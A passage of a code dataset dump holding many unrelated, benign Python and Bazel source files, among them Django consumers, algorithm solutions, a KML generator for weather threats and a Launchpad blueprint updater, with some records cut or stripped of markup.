Group(message.channel_session['id'])\n\tmessage.reply_channel.send({'text': 'In ws_receive'})\n\tgroup.send({\n\t\t\"text\": message.content['text'],\n\t})\n\ndef ws_disconnect(message):\n\tprint(\"In ws_disconnect\")\n\tmessage.reply_channel.send({'text': 'In ws_disconnect'})","sub_path":"operator_app/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"222470954","text":"# efficient solution\nt=int(input())\nl=[]\nfor i in range(t):\n n=int(input())\n l.append(n//2)\nprint(*l,sep='\\n')\n\n\n\n'''\n# exceeds time limit\ndef gcdfunc(a,b): \n if(b==0): \n return a \n else: \n return gcdfunc(b,a%b)\nt=int(input())\na=[]\nfor k in range(t):\n n=int(input())\n l=[]\n for i in range(1,n-1):\n for j in range(1,n):\n if(i= a[2] <= a[3] >= a[4] <= a[5] ...\n\ndef swap(lst, index1, index2):\n lst[index1], lst[index2] = lst[index2], lst[index1]\n\ndef wave_array(integers):\n for index in range(0, len(integers)-1, 2):\n if integers[index] < integers[index+1]:\n swap(integers, index, index+1)\n \n for index in range(1, len(integers)-1, 2):\n if integers[index] > integers[index+1]:\n swap(integers, index, index+1)\n return integers\n\nif __name__ == '__main__':\n integers = [1, 2, 3, 4, 5]\n wave_array(integers)\n print(integers, [2, 1, 4, 3, 5])\n","sub_path":"InterviewBit/wave-array.py","file_name":"wave-array.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"472275480","text":"\"\"\"\n선택(selection) 문제: n개의 값 중에서 k 번째로 작은 수 찾기\n - Qucick Select\n \n list L에서,\n 1. p(pivot)을 고른다. (random or L[0] or L[n-1] whatever)\n 2.\n A = [p보다 작은 값]\n B = [p보다 큰 값]\n M = [p와 같은 값]\n n-1 번의 비교\n 3.\n if len(A) > k: # M, B에는 없음\n A에서 k 번째 작은 값을 재귀적으로 찾는다.\n \n elif len(A) + len(M) < k: # A, M에는 없음\n B에서 k 번째 작은 값을 재귀적으로 찾는다. k - (len(A) + len(M)) 번째를 찾는다.\n \n else: # M에 있음\n return p\n \n def quick_select(L, k):\n p = L[0]\n A, M, B = [], [], []\n\n for x in L:\n if p < x:\n A.append(x)\n elif p > x:\n B.append(x)\n else:\n M.append(x)\n \n if len(A) > k:\n return quick_select(A, k)\n elif len(A) + len(M) < k:\n return quick_select(B, k - len(A) - len(M))\n else:\n return p\n \n Worst Case = O(n^2)\n - 매 호출마다 M의 크기가 1이고, A나 B가 공집합일 때,\n \n Best Case = O(n)\n - 반반씩 잘 쪼개질 때\n \n Average Case = O(n)\n - \n\"\"\"\n\ndef QuickSelect(L, k):\n p = L[0]\n A, M, B = [], [], []\n\n for x in L:\n if p > x:\n A.append(x)\n elif p < x:\n B.append(x)\n else:\n M.append(x)\n \n if len(A) >= k:\n return QuickSelect(A, k)\n elif len(A) + len(M) < k:\n return QuickSelect(B, k-len(A)-len(M))\n else:\n return p\n\nn, k = map(int, input().split())\nL = list(map(int, input().split()))\nresult = QuickSelect(L, k)\nprint(result)","sub_path":"알고리즘/02_Quick_select.py","file_name":"02_Quick_select.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"387714602","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef fill_fc_weights(layers):\n for m in layers.modules():\n if isinstance(m, nn.Conv2d):\n # nn.init.kaiming_normal_(m.weight.data, nonlinearity='relu')\n nn.init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n\nclass VotingModule(nn.Module):\n def __init__(self, inplanes, head_conv, outplanes):\n super(VotingModule, self).__init__()\n self.input_conv = nn.Sequential(nn.Conv2d(inplanes, head_conv, kernel_size=3, padding=1, bias=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(head_conv, head_conv, kernel_size=3, padding=1, bias=True))\n\n self.votes_conv = nn.Sequential(nn.Conv2d(head_conv, head_conv, kernel_size=3, padding=1, bias=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(head_conv, outplanes, kernel_size=1, padding=0, bias=True))\n\n fill_fc_weights(self.input_conv)\n fill_fc_weights(self.votes_conv)\n\n def forward(self, x, votes):\n x = self.input_conv(F.relu(votes)) * x\n x = self.votes_conv(x)\n\n return x\n","sub_path":"nets/voting_conv.py","file_name":"voting_conv.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"128933861","text":"#!/usr/bin/env python\n\n# 3D File Manager in Python OpenGL, light helper routines\n# \n\n#import math, sys, rand\n\nimport gtk.gtkgl\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\n \ndef light(self): \n\n # Lighting properties.\n #light_ambient = [0.0, 0.0, 0.0, 1.0]\n #light_ambient = [1.0, 1.0, 1.0, 1.0]\n light_ambient = [0.5, 0.5, 0.5, 1.0]\n \n #light_diffuse = [0.0, 0.0, 0.0, 1.0]\n light_diffuse = [0.5, 0.5, 0.5, 1.0]\n #light_diffuse = [1.0, 1.0, 1.0, 1.0]\n \n light_specular = [.5, .5, .5, 1.0]\n #light_specular = [1.0, 1.0, 1.0, 1.0]\n #light_specular = [.2, .2, .2, 1.0]\n \n #light_position = [1.0, 1.0, 1.0, 1.0]\n #light_position = [0.0, 5.0, 5.0, 0.0]\n light_position = [0.0, 0.0, 1.0, 0.0]\n #light_position = [5.0, 5.0, 5.0, 0.0]\n \n #light_model_ambient = [0.2, 0.2, 0.2, 1.0]\n light_model_ambient = [0.5, 0.5, 0.5, 1.0]\n #light_model_ambient = [0.9, 0.9, 0.9, 1.0]\n light_local_view = 0.0\n #pos = (5.0, 5.0, 5.0, 0.0)\n\n # Initialise the lighting properties.\n glLightfv (GL_LIGHT0, GL_AMBIENT, light_ambient)\n glLightfv (GL_LIGHT0, GL_DIFFUSE, light_diffuse)\n glLightfv (GL_LIGHT0, GL_SPECULAR, light_specular)\n glLightfv (GL_LIGHT0, GL_POSITION, light_position)\n #glLightModelfv (GL_LIGHT_MODEL_AMBIENT, light_model_ambient)\n #glLightModelf (GL_LIGHT_MODEL_LOCAL_VIEWER, light_local_view)\n\n glEnable (GL_LIGHTING)\n glEnable (GL_LIGHT0)\n glEnable (GL_DEPTH_TEST)\n\n glClearColor(.0, .0, .0, 1.0)\n #glClearColor(.5, .5, .5, 1.0)\n #glClearColor(1.0, 1.0, 1.0, 1.0)\n glClearDepth(1.0)\n\n\n","sub_path":"pyfile/pyfm-010/pyfmlight.py","file_name":"pyfmlight.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"413792293","text":"import logging\nfrom dcindexLib.ix_api_elastic import ix_elastic_all_metatdata_MTL\n\n\n# ################# MAIN ################### #\n\n# get parameters here later hard code for now\n\nlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)\n\ne_index = 'rwanda'\ne_type = 'cube'\n\nmy_bucket = 'landsat-pds'\ntop_directory_prefix = 'c1/L8/172/062'\nix_elastic_all_metatdata_MTL(e_index, e_type, my_bucket, top_directory_prefix)\n\n","sub_path":"app/a1_test_landsat_pds_rwanda.py","file_name":"a1_test_landsat_pds_rwanda.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"269941077","text":"# ----------------------------------------------------------------------------\n# This software is in the public domain, furnished \"as is\", without technical\n# support, and with no warranty, express or implied, as to its usefulness for\n# any purpose.\n#\n# TCImpactGraphics_KML\n#\n# Author: P. Santos/Joe Maloney - 4/19/2011\n#\n# Last edited: 27 July 2012 - Shannon/R. Anderson - made A2 compatible\n# Last Modified 30 July 2012 - J Maloney/P. Santos - made it work with A2\n# Modified 09 Sept 2014 - J. Maloney - for 2015 season, removed MarineThreat,\n# renamed CoastalThreat -> StormSurgeThreat, InlandThreat -> FloodingRainThreat,\n# removed verylow from kml styles in header\n# Modified 11 Sept 2014 - J. Maloney/S. White - site ID is now automatically\n# retrieved from the environment.\n# Modified 16 Sept 2014 - J. Maloney/T. Lefebvre - impact statements are now\n# read from TCVDictionary (in Utilities) and formatted on-the-fly! \n# Modified 21 Oct 2014 - J. Maloney - products now go in /awips2/GFESuite/hti/\n# data.\n#\n# ----------------------------------------------------------------------------\n\nMenuItems = [\"Populate\"]\n\nimport SmartScript\nfrom numpy import *\nimport time\nimport os\nimport TimeRange\nimport AbsTime\nfrom com.raytheon.uf.common.dataplugin.gfe.reference import ReferenceData_CoordinateType as CoordinateType\nimport TCVDictionary\n\nclass Procedure (SmartScript.SmartScript):\n def __init__(self, dbss):\n SmartScript.SmartScript.__init__(self, dbss)\n\n def makeTimeRange(self):\n cTime = int(self._gmtime().unixTime()/ 3600) * 3600\n startTime = AbsTime.AbsTime(cTime - 12 * 3600)\n endTime = AbsTime.AbsTime(cTime + 12 * 3600) # 12 hours\n tr = TimeRange.TimeRange(startTime, endTime)\n\n return tr\n\n def makeThreatKML(self,threatWEName,threatKeys,threatGrid_kml):\n \n# COMMENTS CONFIG READ: the directory below is the directory where the kml txt files will be dumped.\n# From there it is synchronized to the web servers along with the graphics. If you set up\n# your gHLS scripts and data directories in a different place than recommended in the install\n# instructions, you would need to change that directory here. Do not change .kml.txt to .kml.\n# Only .txt file can be uploaded as include files. In the servers a php script will convert the\n# file name so that a browser can properly interpret it as a kml file to be open with Google\n# Earth or equivalent application.\n\n# Also, make sure the ownership of the kml.txt files created below is fxa:fxalpha with permissions set\n# to 666.\n\n# You can test the kml files created by copying them outside AWIPS and renaming them .kml. Then open them with\n# Google Earth.\n\n kml_filename = '/awips2/GFESuite/hti/data/' + threatWEName + '.kml.txt'\n kml = open(kml_filename, 'w')\n kml.write('\\n')\n kml.write('\\n')\n kml.write(''+threatWEName+'.kml\\n\\n')\n kml.write('\\n')\n kml.write('\\n')\n kml.write('\\n')\n kml.write('\\n')\n kml.write(''+threatWEName+'0\\n')\n kml.write('Product LegendProduct Legend1')\n\n # each threatWEName has its own separate legend\n # need site id, in lowercase\n SiteID = self.getSiteID().lower()\n\n if threatWEName == \"StormSurgeThreat\":\n kml.write('http://www.nws.noaa.gov/images/ghls/' + SiteID + '/stormsurgethreatlegend.png')\n elif threatWEName == \"WindThreat\":\n kml.write('http://www.nws.noaa.gov/images/ghls/' + SiteID + '/windthreatlegend.png')\n elif threatWEName == \"FloodingRainThreat\":\n kml.write('http://www.nws.noaa.gov/images/ghls/' + SiteID + '/floodingrainthreatlegend.png')\n elif threatWEName == \"TornadoThreat\":\n kml.write('http://www.nws.noaa.gov/images/ghls/' + SiteID + '/tornadothreatlegend.png')\n\n # Complete the kml legend\n kml.write('')\n \n #threatKeys = self.getDiscreteKeys(threatWEName)\n #print \"THREATKEYS ARE: \", threatKeys\n \n # initialize a flag. It will only be NO for the first polygon in the file.\n flag = 'NO'\n \n for key in threatKeys:\n #print \"Key:\", key\n \n # get index for this key\n hazIndex = self.getIndex(key, threatKeys)\n #print \"hazIndex:\", hazIndex\n\n mask = equal(threatGrid_kml, hazIndex)\n \n #print \"Number of Grid Points: \", sum(sum(mask))\n \n if sum(sum(mask)) == 0:\n continue\n \n # make an editArea from the mask\n editArea = self.decodeEditArea(mask)\n \n # extract the polygons from the edit area\n polygons = editArea.getPolygons(CoordinateType.LATLON)\n\n # pull out the impact statements from the TCVDictionary\n # We need to match the threatWEName to the entries found\n # in the TCVDictionary\n if threatWEName == \"TornadoThreat\":\n threat='Tornado'\n elif threatWEName == \"StormSurgeThreat\":\n threat='Storm Surge'\n elif threatWEName == \"WindThreat\":\n threat='Wind'\n else:\n threat='Flooding Rain'\n \n # Extract the appropriate list from the dictionary, join them\n # into a string, and make them separate bullets\n impactStatement = \"\" \n impactList = TCVDictionary.PotentialImpactStatements[threat][key]\n impactStatement = \"
* \".join(impactList)\n impactStatement = \"* \" + impactStatement\n# print \"impactList:\", impactList\n# print \"impactStatement:\", impactStatement\n \n if key == \"None\":\n kmlHeader='Threat Level - None to LittlePotential for None to Little Impact:
' + impactStatement + '
\\n#none\\n'\n \n elif key == \"Elevated\":\n kmlHeader='Threat Level - ElevatedPotential for Limited Impact:
' + impactStatement + '
\\n#low\\n'\n\n elif key == \"Mod\":\n kmlHeader='Threat Level - ModeratePotential for Significant Impact:
' + impactStatement + '
\\n#moderate\\n'\n\n elif key == \"High\":\n kmlHeader='Threat Level - HighPotential for Extensive Impact:
' + impactStatement + '
\\n#high\\n'\n\n else:\n kmlHeader='Threat Level - ExtremePotential for Devastating to Catastrophic Impact:
' + impactStatement + '
\\n#extreme\\n'\n\n for i in xrange(polygons.getNumGeometries()):\n poly = polygons.getGeometryN(i)\n shell = poly.getExteriorRing();\n if shell:\n # If shell is true, it's a new polygon\n if flag == 'YES':\n # If flag is YES, this is not the first polygon we're writing out\n # so close the previous polygon before continuing.\n kml.write('
\\n')\n \n kml.write(kmlHeader)\n kml.write('')\n #print \"Outer shell coordinates:\"\n for c in shell.getCoordinates():\n #print \"x:\",c.x,\"y:\",c.y \n line = str(c.x) + ',' + str(c.y) + ',0 \\n'\n kml.write(line)\n \n kml.write('')\n # Now that we've written at least one polygon, set flag to YES\n flag = 'YES'\n \n # CHECK FOR INNER LOOPS (HOLES)\n for j in xrange(poly.getNumInteriorRing()):\n hole = poly.getInteriorRingN(j)\n #print \"Hole\",j,\"coordinates:\"\n kml.write('')\n for c in hole.getCoordinates():\n #print \"x:\",c.x,\"y:\",c.y\n line = str(c.x) + ',' + str(c.y) + ',0 \\n'\n kml.write(line)\n\n kml.write('') \n\n kmlEnd='
\\n
\\n'\n kml.write(kmlEnd)\n kml.close()\n\n return\n\n def execute(self, varDict):\n \n tr = self.makeTimeRange()\n threatlist = ['StormSurgeThreat','WindThreat','FloodingRainThreat','TornadoThreat'] \n #threatlist = ['TornadoThreat'] # Took out MarineThreat 8/6/12 S.O. # READDED MARINE THREAT JCM 5/21/14\n\n for grid in threatlist:\n threatWEName = grid\n #print \"Doing grid for time range: \", tr\n threatGrid, threatKeys = self.getGrids(\"Fcst\", threatWEName, \"SFC\", tr)\n\n# COMMENTS CONFIG READ: For each threat element below, you need to change the edit area to the mask you are using \n# in the config file to generate that impact graphic. For example, for CoastalThreat that would be\n# XXXCoastalThreat where XXX is the 3 letter ID for your office. For WindThreat it would be XXXWindThreat.\n# And so on.\n\n if threatWEName == \"StormSurgeThreat\":\n editArea = self.getEditArea(\"StormSurgeWW_EditArea\")\n elif threatWEName == \"WindThreat\":\n editArea = self.getEditArea(\"MFL\")\n elif threatWEName == \"FloodingRainThreat\":\n editArea = self.getEditArea(\"MFL\")\n elif threatWEName == \"TornadoThreat\":\n editArea = self.getEditArea(\"MFL\")\n else:\n editArea = self.getEditArea(\"Marinezones\") \n\n threatEditArea = self.encodeEditArea(editArea)\n threatGrid_kml = where(threatEditArea, threatGrid, threatGrid-9.0)\n\n self.makeThreatKML(threatWEName,threatKeys,threatGrid_kml)\n\n # COMMENTS CONFIG READ: This path should be double-checked\n os.system(\"/awips2/GFESuite/hti/bin/kml_legend.sh\")\n \n return\n\n","sub_path":"cave/com.raytheon.viz.gfe/localization/gfe/userPython/procedures/TCImpactGraphics_KML.py","file_name":"TCImpactGraphics_KML.py","file_ext":"py","file_size_in_byte":11572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"256399780","text":"\"\"\"tam bolen bulma\"\"\"\ndef tambolenler(sayi):\n tam_bolen =[]\n for i in range(2,sayi):#iki ile girdigimiz sayi arasinda dongu olusturduk\n if sayi % i == 0:#sayi dongudeki sayilara tam tam bolunuyorsa tam_bolen =[] listesine ekle\n tam_bolen.append(i)\n return tam_bolen\n\nwhile True:#inputu surekli almamiz icin dongu olusturduk\n try:\n sayi = int(input(\"bir sayi girin: \"))\n if sayi:#sayi girisi yapilmissa\n print(\"tam bolenlerimiz\",tambolenler(sayi))\n except:#int() disinda farkli bir giris yapilirsa islem yapma kullaniciya uyar\n print(\"hatali giris\")","sub_path":"8Hafta-Odevler.py/2-TamBolen.py","file_name":"2-TamBolen.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"329095453","text":"from django.forms import ModelForm\nfrom .models import Training_Appt\nfrom pets.models import Dogs\n\nclass TrainingForm(ModelForm):\n class Meta:\n model = Training_Appt\n fields = '__all__'\n\n\n def __init__(self, *args, **kwargs):\n user = kwargs.pop('pet_user')\n super(TrainingForm, self).__init__(*args, **kwargs)\n self.fields['pet'].queryset = Dogs.objects.filter(owner=user)\n","sub_path":"dogs_site/training/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"417768658","text":"'''\nCreated on Dec 3, 2014\n\n@author: anedospe\n'''\n\nimport util\nfrom libxml2mod import doc\nfrom modules.buildHead import buildHead\nfrom modules.buildSQL import buildSQL \nimport pymongo\nimport time\nimport datetime\n\nclass video_select():\n\n def video_select(self,list_params,db):\n \n collection = db.getCollection('video_select') #get collection\n obj_head=buildHead() #create instance of the class buildHead\n obj_select=buildSQL() #create instance of the class buildSQL\n \n html = obj_head.getBasicHead()\n \n cursor = collection.find({},{ \"_id\" : 0}).sort( [ (\"row_id\",pymongo.ASCENDING), (\"column_id\",pymongo.ASCENDING) ] )\n \n #bod=datetime.datetime.now().strftime(\"%Y-%m-%d\")\n #eod=datetime.datetime.now().strftime(\"%Y-%m-%d\")\n \n eod = datetime.date.today()\n one_day = datetime.timedelta(days=7)\n bod = eod - one_day\n \n \n html+='
'\n html+='
  ' \\\n '  
'\n \n html+='
'\n row=1\n for doc in cursor:\n \n dom_connect=''\n if doc['dom_connect'] != None:\n dom_connect = 'link_url=\"' +str(doc['dom_url']) + '\" link_id=\"' + str(doc['dom_connect']) +'\"'\n \n \n if int(doc['row_id']) == row:\n html+='  <' + str(doc['dom_type']) + ' id=' + str(doc['dom_id']) + ' title=' + str(doc['dom_title']) + ' ' + str(doc['dom_subtype']) + \\\n ' name=' + str(doc['dom_name']) + ' class=' + str(doc['dom_class']) + ' label=' + str(doc['dom_label']) +dom_connect+'>'\n \n html+=obj_select.get_lookup(str(doc['ajax_url']), db)\n \n html+=''\n if row == 1:\n html+='  '\n #title=\"Secondary Filters\"\n #html+=''\n \n else:\n html+=\"
\"\n if row == 1:\n html+='
'\n html+='
'\n html+='  <' + str(doc['dom_type']) + ' id=' + str(doc['dom_id']) + ' title=' + str(doc['dom_title']) + ' ' + str(doc['dom_subtype']) + \\\n ' name=' + str(doc['dom_name']) + ' class=' + str(doc['dom_class']) + ' label=' + str(doc['dom_label']) +dom_connect+'>'\n \n html+=obj_select.get_lookup(str(doc['ajax_url']), db)\n\n \n html+='' \n \n row = int(doc['row_id'])\n \n \n \n html+='
' \n \n html+='
' \n \n html+='
'\n \n html+='' \n return html\n \n\n ","sub_path":"modules/video_select.py","file_name":"video_select.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"507503444","text":"#DESCRIPTION:This python script monitors web sites \n#FILENAME:\n#USAGE:python .\n#\n# If the nonce argument is provided, a nonce attribute will be inserted to all and .\n#\n# This macro is designed to work side by side with the existing Webpack build without requiring any\n# major changes to the pages in question.\ndef sk_page(name, deps, sass_deps, assets_serving_path=\"/\", nonce=None):\n # Output directories.\n DEV_OUT_DIR = \"development\"\n PROD_OUT_DIR = \"production\"\n\n #######################\n # JavaScript bundles. #\n #######################\n\n ts_library(\n name = \"%s_ts_lib\" % name,\n srcs = [\"%s.ts\" % name],\n deps = deps,\n )\n\n # Generates file _js_bundle.js. Intermediate result; do not use.\n rollup_bundle(\n name = \"%s_js_bundle\" % name,\n deps = [\n \":%s_ts_lib\" % name,\n \"@infra-sk_npm//@rollup/plugin-node-resolve\",\n \"@infra-sk_npm//@rollup/plugin-commonjs\",\n \"@infra-sk_npm//rollup-plugin-sourcemaps\",\n ],\n entry_point = \"%s.ts\" % name,\n format = \"umd\",\n config_file = \"//infra-sk:rollup.config.js\",\n )\n\n # Generates file _js_bundle_minified.js. Intermediate result; do not use.\n terser_minified(\n name = \"%s_js_bundle_minified\" % name,\n src = \"%s_js_bundle.js\" % name,\n sourcemap = False,\n )\n\n # Generates file development/.js.\n copy_file(\n name = \"%s_js_dev\" % name,\n src = \"%s_js_bundle.js\" % name,\n dst = \"%s/%s.js\" % (DEV_OUT_DIR, name),\n )\n\n # Generates file production/.js.\n copy_file(\n name = \"%s_js_prod\" % name,\n # For some reason the output of the terser_minified rule above is not directly visible as a\n # source file, so we use the rule name instead (i.e. we drop the \".js\" extension).\n src = \"%s_js_bundle_minified\" % name,\n dst = \"%s/%s.js\" % (PROD_OUT_DIR, name),\n )\n\n ################\n # CSS Bundles. #\n ################\n\n # Notes:\n # - The source maps generated by the sass_binary rule are currently broken.\n # - Sass compilation errors are not visible unless \"bazel build\" is invoked with flag\n # \"--strategy=SassCompiler=sandboxed\". This is due to a known issue with sass_binary. For\n # more details please see https://github.com/bazelbuild/rules_sass/issues/96.\n\n # Generates file development/.css.\n sass_binary(\n name = \"%s_css_dev\" % name,\n src = \"%s.scss\" % name,\n output_name = \"%s/%s.css\" % (DEV_OUT_DIR, name),\n deps = sass_deps,\n include_paths = [\"//infra-sk/node_modules\"],\n output_style = \"expanded\",\n sourcemap = True,\n )\n\n # Generates file production/.css.\n sass_binary(\n name = \"%s_css_prod\" % name,\n src = \"%s.scss\" % name,\n output_name = \"%s/%s.css\" % (PROD_OUT_DIR, name),\n deps = sass_deps,\n include_paths = [\"//infra-sk/node_modules\"],\n output_style = \"compressed\",\n sourcemap = False,\n )\n\n ###############\n # HTML files. #\n ###############\n\n # Generates file .with_assets.html. Intermediate result; do not use.\n #\n # See https://www.npmjs.com/package/html-insert-assets.\n html_insert_assets(\n name = \"%s_html\" % name,\n outs = [\"%s.with_assets.html\" % name],\n args = [\n \"--html=$(location %s.html)\" % name,\n \"--out=$@\",\n \"--roots=$(RULEDIR)\",\n \"--assets\",\n # This is OK because html-insert-assets normalizes paths with successive slashes.\n \"%s/%s.js\" % (assets_serving_path, name),\n \"%s/%s.css\" % (assets_serving_path, name),\n ],\n data = [\"%s.html\" % name],\n )\n\n if nonce:\n # Generates file .with_assets_and_nonce.html. Intermediate result; do not use.\n html_insert_nonce_attribute(\n name = \"%s_html_nonce\" % name,\n src = \"%s.with_assets.html\" % name,\n out = \"%s.with_assets_and_nonce.html\" % name,\n nonce = nonce,\n )\n\n instrumented_html = (\"%s.with_assets_and_nonce.html\" if nonce else \"%s.with_assets.html\") % name\n\n # Generates file development/.html.\n copy_file(\n name = \"%s_html_dev\",\n src = instrumented_html,\n dst = \"%s/%s.html\" % (DEV_OUT_DIR, name),\n )\n\n # Generates file production/.html.\n copy_file(\n name = \"%s_html_prod\",\n src = instrumented_html,\n dst = \"%s/%s.html\" % (PROD_OUT_DIR, name),\n )\n\n ###########################\n # Convenience filegroups. #\n ###########################\n\n # Generates all output files (that is, the development and production bundles).\n native.filegroup(\n name = name,\n srcs = [\n \":%s_dev\" % name,\n \":%s_prod\" % name,\n ],\n )\n\n # Generates the development bundle.\n native.filegroup(\n name = \"%s_dev\" % name,\n srcs = [\n \"development/%s.html\" % name,\n \"development/%s.js\" % name,\n \"development/%s.css\" % name,\n ]\n )\n\n # Generates the production bundle.\n native.filegroup(\n name = \"%s_prod\" % name,\n srcs = [\n \"production/%s.html\" % name,\n \"production/%s.js\" % name,\n \"production/%s.css\" % name,\n ]\n )\n","sub_path":"infra-sk/index.bzl","file_name":"index.bzl","file_ext":"bzl","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"387602640","text":"import csv\nimport os\n\nfrom cities_light.models import City\nfrom jobs.models import Job\n\ndirec = os.path.dirname(os.path.abspath(__file__))\n\n\ndef create_job_instance(row):\n job = Job(\n description=row['description'], \n expiration_date=row['expiration_date'],\n employment_type=row['employment_type'],\n education=row['education'],\n headline=row['headline'],\n post_date=row['post_date'],\n slug=row['slug'],\n location=row['location'],\n salary=row['salary'],\n salary_frequency=row['salary_frequency'],\n benefits=row['benefits'],\n link=row['link'],\n job_title=row['job_title'],\n )\n job.save()\n\n\nwith open('jobs_2020.csv') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n with open(f'{direc}/jobs_20201.csv', 'w') as f:\n writer = csv.DictWriter(\n f,\n fieldnames=[\n 'description', \n 'expiration_date',\n 'employment_type',\n 'education',\n 'headline',\n 'post_date',\n 'slug',\n 'location',\n 'salary',\n 'salary_frequency',\n 'benefits',\n 'link',\n 'job_title',\n ])\n writer.writeheader()\n for row in csv_reader:\n city_name = row['location']\n city = City.objects.get(name=city_name)\n row['location'] = city\n writer.writerow(row)\n create_job_instance(row)","sub_path":"seed_db.py","file_name":"seed_db.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"583475598","text":"# Copyright 2015 Thierry Carrez \n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import print_function\nimport argparse\nimport datetime\nimport sys\n\nimport launchpadlib.launchpad\nimport pytz\n\n# Parameters\nparser = argparse.ArgumentParser(description=\"Update BPs on milestone closure\")\nparser.add_argument('project', help='The project to act on')\nparser.add_argument('milestone', help='The milestone to set')\nparser.add_argument(\"--target\", action='store_true',\n help='Set target and/or series goal for implemented BPs')\nparser.add_argument(\"--clear\", action='store_true',\n help='Clear milestone from incomplete blueprints')\nparser.add_argument(\"--test\", action='store_const', const='staging',\n default='production', help='Use LP staging server to test')\nargs = parser.parse_args()\n\n# Connect to Launchpad\nprint(\"Connecting to Launchpad...\")\nlaunchpad = launchpadlib.launchpad.Launchpad.login_with('openstack-releasing',\n args.test, version='devel')\n\nproject = launchpad.projects[args.project]\nmilestone = project.getMilestone(name=args.milestone)\nif not milestone:\n parser.error('Target milestone %s does not exist' % args.milestone)\nseries = milestone.series_target\n\n# Get the blueprints\nprint(\"Retrieving blueprints...\")\nnow = datetime.datetime.now(tz=pytz.utc)\nto_clear = []\nto_series = []\nto_target = []\ncount = 0\nbps = project.all_specifications\nnumbps = len(bps)\n# Also get the series-targeted approved blueprints\nseriesbps = series.valid_specifications\nprint(\"retrieved %d blueprints\" % numbps)\n\n# Parse the blueprints\nprint(\"Parsing blueprints...\")\nfor bp in bps:\n count = count + 1\n sys.stdout.write(\"\\r%d%%\" % int(count * 100 / numbps))\n sys.stdout.flush()\n if ((bp.implementation_status == 'Implemented') and\n ((now - bp.date_completed) < datetime.timedelta(days=92)) and\n (not bp.milestone or not bp.milestone.date_targeted or\n bp.milestone.date_targeted >= milestone.date_targeted)):\n if bp not in seriesbps:\n to_series.append(bp)\n if bp.milestone != milestone:\n to_target.append(bp)\n elif not bp.is_complete and bp.milestone == milestone:\n to_clear.append(bp)\nprint()\nif (to_target):\n print()\n print(\"Those are implemented: need milestone target added\")\n for bp in to_target:\n print(bp.web_link)\n if args.target:\n bp.milestone = milestone\n bp.lp_save()\n\nif (to_series):\n print()\n print(\"Those are implemented: need series goal added/approved\")\n for bp in to_series:\n print(bp.web_link)\n if args.target:\n bp.proposeGoal(goal=series)\n\nif (to_clear):\n print()\n print(\"Those are incomplete: need their milestone target cleared\")\n for bp in to_clear:\n print(bp.web_link)\n if args.clear:\n bp.milestone = None\n bp.lp_save()\n","sub_path":"adjust_blueprints.py","file_name":"adjust_blueprints.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}